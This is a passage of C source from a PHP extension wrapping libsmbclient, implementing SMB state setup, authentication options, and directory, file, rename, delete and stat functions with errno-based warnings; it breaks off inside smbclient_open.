SMBCLIENT_CONST(SMBCLIENT_OPT_PORT);
SMBCLIENT_CONST(SMBCLIENT_OPT_TIMEOUT);
#undef SMBCLIENT_CONST
/* Constants for use with SMBCLIENT_OPT_OPENSHAREMODE: */
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_DOS", SMBC_SHAREMODE_DENY_DOS, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_ALL", SMBC_SHAREMODE_DENY_ALL, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_WRITE", SMBC_SHAREMODE_DENY_WRITE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_READ", SMBC_SHAREMODE_DENY_READ, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_NONE", SMBC_SHAREMODE_DENY_NONE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_FCB", SMBC_SHAREMODE_DENY_FCB, CONST_PERSISTENT | CONST_CS);
/* Constants for use with SMBCLIENT_OPT_ENCRYPTLEVEL: */
REGISTER_LONG_CONSTANT("SMBCLIENT_ENCRYPTLEVEL_NONE", SMBC_ENCRYPTLEVEL_NONE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_ENCRYPTLEVEL_REQUEST", SMBC_ENCRYPTLEVEL_REQUEST, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_ENCRYPTLEVEL_REQUIRE", SMBC_ENCRYPTLEVEL_REQUIRE, CONST_PERSISTENT | CONST_CS);
/* Constants for the VFS functions: */
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_RDONLY", SMBC_VFS_FEATURE_RDONLY, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_DFS", SMBC_VFS_FEATURE_DFS, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_CASE_INSENSITIVE", SMBC_VFS_FEATURE_CASE_INSENSITIVE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_NO_UNIXCIFS", SMBC_VFS_FEATURE_NO_UNIXCIFS, CONST_PERSISTENT | CONST_CS);
le_smbclient_state = zend_register_list_destructors_ex(smbclient_state_dtor, NULL, PHP_SMBCLIENT_STATE_NAME, module_number);
le_smbclient_file = zend_register_list_destructors_ex(smbclient_file_dtor, NULL, PHP_SMBCLIENT_FILE_NAME, module_number);
php_register_url_stream_wrapper("smb", &php_stream_smb_wrapper TSRMLS_CC);
/* register with old name for code using extension_loaded(libsmbclient) */
zend_register_internal_module(&old_module_entry TSRMLS_CC);
return SUCCESS;
}
PHP_RINIT_FUNCTION(smbclient)
{
return SUCCESS;
}
PHP_MSHUTDOWN_FUNCTION(smbclient)
{
return SUCCESS;
}
PHP_RSHUTDOWN_FUNCTION(smbclient)
{
php_smb_pool_cleanup(TSRMLS_C);
return SUCCESS;
}
PHP_MINFO_FUNCTION(smbclient)
{
php_info_print_table_start();
php_info_print_table_row(2, "smbclient Support", "enabled");
php_info_print_table_row(2, "smbclient extension Version", PHP_SMBCLIENT_VERSION);
php_info_print_table_row(2, "libsmbclient library Version", smbc_version());
php_info_print_table_end();
}
static int
ctx_init_getauth (zval *z, char **dest, int *destlen, char *varname)
{
if (*dest != NULL) {
efree(*dest);
*dest = NULL;
}
*destlen = 0;
if (z == NULL) {
return 1;
}
switch (Z_TYPE_P(z))
{
case IS_NULL:
return 1;
#if PHP_MAJOR_VERSION >= 7
case IS_TRUE:
php_error(E_WARNING, "invalid value for %s", varname);
return 0;
case IS_FALSE:
return 1;
#else
case IS_BOOL:
if (Z_LVAL_P(z) == 1) {
php_error(E_WARNING, "invalid value for %s", varname);
return 0;
}
return 1;
#endif
case IS_STRING:
*destlen = Z_STRLEN_P(z);
*dest = estrndup(Z_STRVAL_P(z), *destlen);
return 1;
default:
php_error(E_WARNING, "invalid datatype for %s", varname);
return 0;
}
}
php_smbclient_state *
php_smbclient_state_new (php_stream_context *context, int init TSRMLS_DC)
{
php_smbclient_state *state;
SMBCCTX *ctx;
if ((ctx = smbc_new_context()) == NULL) {
switch (errno) {
case ENOMEM: php_error(E_WARNING, "Couldn't create smbclient state: insufficient memory"); break;
default: php_error(E_WARNING, "Couldn't create smbclient state: unknown error (%d)", errno); break;
};
return NULL;
}
state = emalloc(sizeof(php_smbclient_state));
state->ctx = ctx;
state->wrkg = NULL;
state->user = NULL;
state->pass = NULL;
state->wrkglen = 0;
state->userlen = 0;
state->passlen = 0;
state->err = 0;
smbc_setFunctionAuthDataWithContext(state->ctx, smbclient_auth_func);
/* Must also save a pointer to the state object inside the context, to
* find the state from the context in the auth function: */
smbc_setOptionUserData(ctx, (void *)state);
/* Force full, modern timenames when getting xattrs: */
smbc_setOptionFullTimeNames(state->ctx, 1);
if (context) {
#if PHP_MAJOR_VERSION >= 7
zval *tmpzval;
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "workgroup"))) {
if (ctx_init_getauth(tmpzval, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
php_smbclient_state_free(state);
return NULL;
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "username"))) {
if (ctx_init_getauth(tmpzval, &state->user, &state->userlen, "username") == 0) {
php_smbclient_state_free(state);
return NULL;
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "password"))) {
if (ctx_init_getauth(tmpzval, &state->pass, &state->passlen, "password") == 0) {
php_smbclient_state_free(state);
return NULL;
}
}
#if HAVE_SMBC_SETOPTIONPROTOCOLS
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "minproto"))) {
smbc_setOptionProtocols(state->ctx, Z_STRVAL_P(tmpzval), NULL);
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "maxproto"))) {
smbc_setOptionProtocols(state->ctx, NULL, Z_STRVAL_P(tmpzval));
}
#endif
#else
zval **tmpzval;
if (php_stream_context_get_option(context, "smb", "workgroup", &tmpzval) == SUCCESS) {
if (ctx_init_getauth(*tmpzval, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
if (php_stream_context_get_option(context, "smb", "username", &tmpzval) == SUCCESS) {
if (ctx_init_getauth(*tmpzval, &state->user, &state->userlen, "username") == 0) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
if (php_stream_context_get_option(context, "smb", "password", &tmpzval) == SUCCESS) {
if (ctx_init_getauth(*tmpzval, &state->pass, &state->passlen, "password") == 0) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
#if HAVE_SMBC_SETOPTIONPROTOCOLS
if (php_stream_context_get_option(context, "smb", "minproto", &tmpzval) == SUCCESS) {
smbc_setOptionProtocols(state->ctx, Z_STRVAL_PP(tmpzval), NULL);
}
if (php_stream_context_get_option(context, "smb", "maxproto", &tmpzval) == SUCCESS) {
smbc_setOptionProtocols(state->ctx, NULL, Z_STRVAL_PP(tmpzval));
}
#endif
#endif
}
if (init) {
if (php_smbclient_state_init(state TSRMLS_CC)) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
return state;
}
PHP_FUNCTION(smbclient_state_new)
{
php_smbclient_state *state;
if (zend_parse_parameters_none() == FAILURE) {
RETURN_FALSE;
}
if ((state = php_smbclient_state_new(NULL, 0 TSRMLS_CC)) == NULL) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(state, le_smbclient_state));
#else
ZEND_REGISTER_RESOURCE(return_value, state, le_smbclient_state);
#endif
}
PHP_FUNCTION(smbclient_version)
{
if (zend_parse_parameters_none() == FAILURE) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(PHP_SMBCLIENT_VERSION);
#else
RETURN_STRING(PHP_SMBCLIENT_VERSION, 1);
#endif
}
PHP_FUNCTION(smbclient_library_version)
{
if (zend_parse_parameters_none() == FAILURE) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(smbc_version());
#else
RETURN_STRING(smbc_version(), 1);
#endif
}
int
php_smbclient_state_init (php_smbclient_state *state TSRMLS_DC)
{
SMBCCTX *ctx;
if ((ctx = smbc_init_context(state->ctx)) != NULL) {
state->ctx = ctx;
return 0;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't init SMB context: null context given"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't init SMB context: insufficient memory"); break;
case ENOENT: php_error(E_WARNING, "Couldn't init SMB context: cannot load smb.conf"); break;
default: php_error(E_WARNING, "Couldn't init SMB context: unknown error (%d)", errno); break;
}
return 1;
}
#if PHP_MAJOR_VERSION >= 7
#define SMB_FETCH_RESOURCE(_state, _type, _zval, _name, _le) \
if ((_state = (_type)zend_fetch_resource(Z_RES_P(*_zval), _name, _le)) == NULL) { \
RETURN_FALSE; \
}
#else
#define SMB_FETCH_RESOURCE(_state, _type, _zval, _name, _le) \
ZEND_FETCH_RESOURCE(_state, _type, _zval, -1, _name, _le);
#endif
#define STATE_FROM_ZSTATE \
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state); \
if (state == NULL || state->ctx == NULL) { \
php_error(E_WARNING, PHP_SMBCLIENT_STATE_NAME " not found"); \
RETURN_FALSE; \
}
#define FILE_FROM_ZFILE \
SMB_FETCH_RESOURCE(file, SMBCFILE *, &zfile, PHP_SMBCLIENT_FILE_NAME, le_smbclient_file); \
if (file == NULL) { \
php_error(E_WARNING, PHP_SMBCLIENT_FILE_NAME " not found"); \
RETURN_FALSE; \
}
PHP_FUNCTION(smbclient_state_init)
{
zval *zstate;
zval *zwrkg = NULL;
zval *zuser = NULL;
zval *zpass = NULL;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r|zzz", &zstate, &zwrkg, &zuser, &zpass) != SUCCESS) {
RETURN_FALSE;
}
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
if (state->ctx == NULL) {
php_error(E_WARNING, "Couldn't init SMB context: context is null");
RETURN_FALSE;
}
if (ctx_init_getauth(zwrkg, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
RETURN_FALSE;
}
if (ctx_init_getauth(zuser, &state->user, &state->userlen, "username") == 0) {
RETURN_FALSE;
}
if (ctx_init_getauth(zpass, &state->pass, &state->passlen, "password") == 0) {
RETURN_FALSE;
}
if (php_smbclient_state_init(state TSRMLS_CC)) {
RETURN_FALSE;
}
RETURN_TRUE;
}
PHP_FUNCTION(smbclient_state_errno)
{
zval *zstate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", &zstate) != SUCCESS) {
RETURN_LONG(0);
}
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
RETURN_LONG(state->err);
}
PHP_FUNCTION(smbclient_state_free)
{
zval *zstate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", &zstate) != SUCCESS) {
RETURN_FALSE;
}
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
if (state->ctx == NULL) {
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zstate));
#else
zend_list_delete(Z_LVAL_P(zstate));
#endif
RETURN_TRUE;
}
if (smbc_free_context(state->ctx, 1) == 0) {
state->ctx = NULL;
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zstate));
#else
zend_list_delete(Z_LVAL_P(zstate));
#endif
RETURN_TRUE;
}
switch (state->err = errno) {
case EBUSY: php_error(E_WARNING, "Couldn't destroy smbclient state: connection in use"); break;
case EBADF: php_error(E_WARNING, "Couldn't destroy smbclient state: invalid handle"); break;
default: php_error(E_WARNING, "Couldn't destroy smbclient state: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_opendir)
{
char *path;
strsize_t path_len;
zval *zstate;
SMBCFILE *dir;
smbc_opendir_fn smbc_opendir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &path, &path_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_opendir = smbc_getFunctionOpendir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((dir = smbc_opendir(state->ctx, path)) != NULL) {
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(dir, le_smbclient_file));
#else
ZEND_REGISTER_RESOURCE(return_value, dir, le_smbclient_file);
#endif
return;
}
hide_password(path, path_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't open SMB directory %s: Permission denied", path); break;
case EINVAL: php_error(E_WARNING, "Couldn't open SMB directory %s: Invalid URL", path); break;
case ENOENT: php_error(E_WARNING, "Couldn't open SMB directory %s: Path does not exist", path); break;
case ENOMEM: php_error(E_WARNING, "Couldn't open SMB directory %s: Insufficient memory", path); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't open SMB directory %s: Not a directory", path); break;
case EPERM: php_error(E_WARNING, "Couldn't open SMB directory %s: Workgroup not found", path); break;
case ENODEV: php_error(E_WARNING, "Couldn't open SMB directory %s: Workgroup or server not found", path); break;
default: php_error(E_WARNING, "Couldn't open SMB directory %s: unknown error (%d)", path, errno); break;
}
RETURN_FALSE;
}
static char *
type_to_string (unsigned int type)
{
switch (type) {
case SMBC_WORKGROUP: return "workgroup";
case SMBC_SERVER: return "server";
case SMBC_FILE_SHARE: return "file share";
case SMBC_PRINTER_SHARE: return "printer share";
case SMBC_COMMS_SHARE: return "communication share";
case SMBC_IPC_SHARE: return "IPC share";
case SMBC_DIR: return "directory";
case SMBC_FILE: return "file";
case SMBC_LINK: return "link";
}
return "unknown";
}
PHP_FUNCTION(smbclient_readdir)
{
struct smbc_dirent *dirent;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_readdir_fn smbc_readdir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_readdir = smbc_getFunctionReaddir(state->ctx)) == NULL) {
RETURN_FALSE;
}
errno = 0;
if ((dirent = smbc_readdir(state->ctx, file)) == NULL) {
switch (state->err = errno) {
case 0: RETURN_FALSE;
case EBADF: php_error(E_WARNING, "Couldn't read " PHP_SMBCLIENT_FILE_NAME ": Not a directory resource"); break;
case EINVAL: php_error(E_WARNING, "Couldn't read " PHP_SMBCLIENT_FILE_NAME ": State resource not initialized"); break;
default: php_error(E_WARNING, "Couldn't read " PHP_SMBCLIENT_FILE_NAME ": unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
#if PHP_MAJOR_VERSION >= 7
add_assoc_string(return_value, "type", type_to_string(dirent->smbc_type));
add_assoc_stringl(return_value, "comment", dirent->comment, dirent->commentlen);
add_assoc_stringl(return_value, "name", dirent->name, dirent->namelen);
#else
add_assoc_string(return_value, "type", type_to_string(dirent->smbc_type), 1);
add_assoc_stringl(return_value, "comment", dirent->comment, dirent->commentlen, 1);
add_assoc_stringl(return_value, "name", dirent->name, dirent->namelen, 1);
#endif
}
PHP_FUNCTION(smbclient_closedir)
{
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_closedir_fn smbc_closedir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_closedir = smbc_getFunctionClosedir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_closedir(state->ctx, file) == 0) {
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zfile));
#else
zend_list_delete(Z_LVAL_P(zfile));
#endif
RETURN_TRUE;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't close " PHP_SMBCLIENT_FILE_NAME ": Not a directory resource"); break;
default: php_error(E_WARNING, "Couldn't close " PHP_SMBCLIENT_FILE_NAME ": unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_rename)
{
char *ourl, *nurl;
strsize_t ourl_len, nurl_len;
zval *zstate_old;
zval *zstate_new;
smbc_rename_fn smbc_rename;
php_smbclient_state *state_old;
php_smbclient_state *state_new;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rsrs", &zstate_old, &ourl, &ourl_len, &zstate_new, &nurl, &nurl_len) == FAILURE) {
return;
}
SMB_FETCH_RESOURCE(state_old, php_smbclient_state *, &zstate_old, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
SMB_FETCH_RESOURCE(state_new, php_smbclient_state *, &zstate_new, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
if (state_old == NULL || state_old->ctx == NULL) {
php_error(E_WARNING, "old " PHP_SMBCLIENT_STATE_NAME " is null");
RETURN_FALSE;
}
if (state_new == NULL || state_new->ctx == NULL) {
php_error(E_WARNING, "new " PHP_SMBCLIENT_STATE_NAME " is null");
RETURN_FALSE;
}
if ((smbc_rename = smbc_getFunctionRename(state_old->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_rename(state_old->ctx, ourl, state_new->ctx, nurl) == 0) {
RETURN_TRUE;
}
hide_password(ourl, ourl_len);
switch (state_old->err = errno) {
case EISDIR: php_error(E_WARNING, "Couldn't rename SMB directory %s: existing url is not a directory", ourl); break;
case EACCES: php_error(E_WARNING, "Couldn't open SMB directory %s: Permission denied", ourl); break;
case EINVAL: php_error(E_WARNING, "Couldn't open SMB directory %s: Invalid URL", ourl); break;
case ENOENT: php_error(E_WARNING, "Couldn't open SMB directory %s: Path does not exist", ourl); break;
case ENOMEM: php_error(E_WARNING, "Couldn't open SMB directory %s: Insufficient memory", ourl); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't open SMB directory %s: Not a directory", ourl); break;
case EPERM: php_error(E_WARNING, "Couldn't open SMB directory %s: Workgroup not found", ourl); break;
case EXDEV: php_error(E_WARNING, "Couldn't open SMB directory %s: Workgroup or server not found", ourl); break;
case EEXIST: php_error(E_WARNING, "Couldn't rename SMB directory %s: new name already exists", ourl); break;
default: php_error(E_WARNING, "Couldn't open SMB directory %s: unknown error (%d)", ourl, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_unlink)
{
char *url;
strsize_t url_len;
zval *zstate;
smbc_unlink_fn smbc_unlink;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_unlink = smbc_getFunctionUnlink(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_unlink(state->ctx, url) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't delete %s: Permission denied", url); break;
case EINVAL: php_error(E_WARNING, "Couldn't delete %s: Invalid URL", url); break;
case ENOENT: php_error(E_WARNING, "Couldn't delete %s: Path does not exist", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't delete %s: Insufficient memory", url); break;
case EPERM: php_error(E_WARNING, "Couldn't delete %s: Workgroup not found", url); break;
case EISDIR: php_error(E_WARNING, "Couldn't delete %s: It is a Directory (use rmdir instead)", url); break;
case EBUSY: php_error(E_WARNING, "Couldn't delete %s: Device or resource busy", url); break;
default: php_error(E_WARNING, "Couldn't delete %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_mkdir)
{
char *path = NULL;
strsize_t path_len;
zend_long mode = 0777; /* Same as PHP's native mkdir() */
zval *zstate;
smbc_mkdir_fn smbc_mkdir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs|l", &zstate, &path, &path_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_mkdir = smbc_getFunctionMkdir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_mkdir(state->ctx, path, (mode_t)mode) == 0) {
RETURN_TRUE;
}
hide_password(path, path_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't create SMB directory %s: Permission denied", path); break;
case EINVAL: php_error(E_WARNING, "Couldn't create SMB directory %s: Invalid URL", path); break;
case ENOENT: php_error(E_WARNING, "Couldn't create SMB directory %s: Path does not exist", path); break;
case ENOMEM: php_error(E_WARNING, "Couldn't create SMB directory %s: Insufficient memory", path); break;
case EEXIST: php_error(E_WARNING, "Couldn't create SMB directory %s: Directory already exists", path); break;
default: php_error(E_WARNING, "Couldn't create SMB directory %s: unknown error (%d)", path, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_rmdir)
{
char *url;
strsize_t url_len;
zval *zstate;
smbc_rmdir_fn smbc_rmdir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_rmdir = smbc_getFunctionRmdir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_rmdir(state->ctx, url) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't delete %s: Permission denied", url); break;
case EINVAL: php_error(E_WARNING, "Couldn't delete %s: Invalid URL", url); break;
case ENOENT: php_error(E_WARNING, "Couldn't delete %s: Path does not exist", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't delete %s: Insufficient memory", url); break;
case EPERM: php_error(E_WARNING, "Couldn't delete %s: Workgroup not found", url); break;
case ENOTEMPTY: php_error(E_WARNING, "Couldn't delete %s: It is not empty", url); break;
default: php_error(E_WARNING, "Couldn't delete %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_stat)
{
char *file;
struct stat statbuf;
strsize_t file_len;
zval *zstate;
smbc_stat_fn smbc_stat;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &file, &file_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_stat = smbc_getFunctionStat(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_stat(state->ctx, file, &statbuf) < 0) {
hide_password(file, file_len);
switch (state->err = errno) {
case ENOENT: php_error(E_WARNING, "Couldn't stat %s: Does not exist", file); break;
case EINVAL: php_error(E_WARNING, "Couldn't stat: null URL or smbc_init failed"); break;
case EACCES: php_error(E_WARNING, "Couldn't stat %s: Permission denied", file); break;
case ENOMEM: php_error(E_WARNING, "Couldn't stat %s: Out of memory", file); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't stat %s: Not a directory", file); break;
default: php_error(E_WARNING, "Couldn't stat %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_index_long(return_value, 0, statbuf.st_dev);
add_index_long(return_value, 1, statbuf.st_ino);
add_index_long(return_value, 2, statbuf.st_mode);
add_index_long(return_value, 3, statbuf.st_nlink);
add_index_long(return_value, 4, statbuf.st_uid);
add_index_long(return_value, 5, statbuf.st_gid);
add_index_long(return_value, 6, statbuf.st_rdev);
add_index_long(return_value, 7, statbuf.st_size);
add_index_long(return_value, 8, statbuf.st_atime);
add_index_long(return_value, 9, statbuf.st_mtime);
add_index_long(return_value, 10, statbuf.st_ctime);
add_index_long(return_value, 11, statbuf.st_blksize);
add_index_long(return_value, 12, statbuf.st_blocks);
add_assoc_long(return_value, "dev", statbuf.st_dev);
add_assoc_long(return_value, "ino", statbuf.st_ino);
add_assoc_long(return_value, "mode", statbuf.st_mode);
add_assoc_long(return_value, "nlink", statbuf.st_nlink);
add_assoc_long(return_value, "uid", statbuf.st_uid);
add_assoc_long(return_value, "gid", statbuf.st_gid);
add_assoc_long(return_value, "rdev", statbuf.st_rdev);
add_assoc_long(return_value, "size", statbuf.st_size);
add_assoc_long(return_value, "atime", statbuf.st_atime);
add_assoc_long(return_value, "mtime", statbuf.st_mtime);
add_assoc_long(return_value, "ctime", statbuf.st_ctime);
add_assoc_long(return_value, "blksize", statbuf.st_blksize);
add_assoc_long(return_value, "blocks", statbuf.st_blocks);
}
PHP_FUNCTION(smbclient_fstat)
{
struct stat statbuf;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_fstat_fn smbc_fstat;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_fstat = smbc_getFunctionFstat(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_fstat(state->ctx, file, &statbuf) < 0) {
switch (state->err = errno) {
case ENOENT: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Does not exist"); break;
case EINVAL: php_error(E_WARNING, "Couldn't fstat: null resource or smbc_init failed"); break;
case EACCES: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Permission denied"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Out of memory"); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Not a directory"); break;
default: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_index_long(return_value, 0, statbuf.st_dev);
add_index_long(return_value, 1, statbuf.st_ino);
add_index_long(return_value, 2, statbuf.st_mode);
add_index_long(return_value, 3, statbuf.st_nlink);
add_index_long(return_value, 4, statbuf.st_uid);
add_index_long(return_value, 5, statbuf.st_gid);
add_index_long(return_value, 6, statbuf.st_rdev);
add_index_long(return_value, 7, statbuf.st_size);
add_index_long(return_value, 8, statbuf.st_atime);
add_index_long(return_value, 9, statbuf.st_mtime);
add_index_long(return_value, 10, statbuf.st_ctime);
add_index_long(return_value, 11, statbuf.st_blksize);
add_index_long(return_value, 12, statbuf.st_blocks);
add_assoc_long(return_value, "dev", statbuf.st_dev);
add_assoc_long(return_value, "ino", statbuf.st_ino);
add_assoc_long(return_value, "mode", statbuf.st_mode);
add_assoc_long(return_value, "nlink", statbuf.st_nlink);
add_assoc_long(return_value, "uid", statbuf.st_uid);
add_assoc_long(return_value, "gid", statbuf.st_gid);
add_assoc_long(return_value, "rdev", statbuf.st_rdev);
add_assoc_long(return_value, "size", statbuf.st_size);
add_assoc_long(return_value, "atime", statbuf.st_atime);
add_assoc_long(return_value, "mtime", statbuf.st_mtime);
add_assoc_long(return_value, "ctime", statbuf.st_ctime);
add_assoc_long(return_value, "blksize", statbuf.st_blksize);
add_assoc_long(return_value, "blocks", statbuf.st_blocks);
}
int
flagstring_to_smbflags (const char *flags, int flags_len, int *retval TSRMLS_DC)
{
/* Returns 0 on failure, or 1 on success with *retval filled. */
if (flags_len != 1 && flags_len != 2) {
goto err;
}
if (flags_len == 2 && flags[1] != '+') {
goto err;
}
/* For both lengths, add the "core business" flags.
* See php_stream_parse_fopen_modes() in PHP's /main/streams/plain_wrapper.c
* for how PHP's native fopen() translates these flags: */
switch (flags[0]) {
case 'r': *retval = 0; break;
case 'w': *retval = O_CREAT | O_TRUNC; break;
case 'a': *retval = O_CREAT | O_APPEND; break;
case 'x': *retval = O_CREAT | O_EXCL; break;
case 'c': *retval = O_CREAT; break;
default: goto err;
}
/* If length is 1, enforce read-only or write-only: */
if (flags_len == 1) {
*retval |= (*retval == 0) ? O_RDONLY : O_WRONLY;
return 1;
}
/* Length is 2 and this is a '+' mode, so read/write everywhere: */
*retval |= O_RDWR;
return 1;
err:
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid flag string '%s'", flags);
return 0;
}
PHP_FUNCTION(smbclient_open)
{
char *file, *flags;
strsize_t file_len, flags_len;
int smbflags;
zend_long mode = 0666;
zval *zstate;
SMBCFILE *handle;
smbc_open_fn smbc_open;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rss|l", &zstate, &file, &file_len, &flags, &flags_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
/* The flagstring is in the same format as the native fopen() uses, so
* one of the characters r, w, a, x, c, optionally followed by a plus.
* Need to translate this to an integer value for smbc_open: */
if (flagstring_to_smbflags(flags, flags_len, &smbflags TSRMLS_CC) == 0) {
RETURN_FALSE;
}
if ((smbc_open = smbc_getFunctionOpen(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((handle = smbc_open(state->ctx, file, smbflags, mode)) != NULL) {
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(handle, le_smbclient_file));
#else
